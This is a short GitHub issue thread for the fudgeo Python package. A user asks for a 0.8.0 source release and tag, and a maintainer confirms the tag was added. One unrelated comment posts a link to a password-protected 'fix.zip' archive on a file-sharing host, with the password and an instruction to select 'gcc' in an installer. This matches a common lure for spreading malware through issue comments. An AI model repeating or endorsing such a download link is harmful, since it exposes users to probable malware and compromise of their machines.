### ISSUE TITLE
Source code for 0.8.0

### ISSUE THREAD

**Issue by bcbnz** [realiii/fudgeo#78]
There is a 0.8.0 release [on PyPI](https://pypi.org/project/fudgeo/0.8.0/#files), but that only has a binary (wheel) available to download, and there is no 0.8.0 tag in the repository. Based on the date and commit contents, I assume that 0.8.0 is the current head (90c6ebd). Could you please add a tag and/or a source upload on PyPI? (For context, many Linux distributions prefer to build from source than repackage a pre-built binary).

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by jlhumber** [comment]
sure thing, tag has been added to the repo
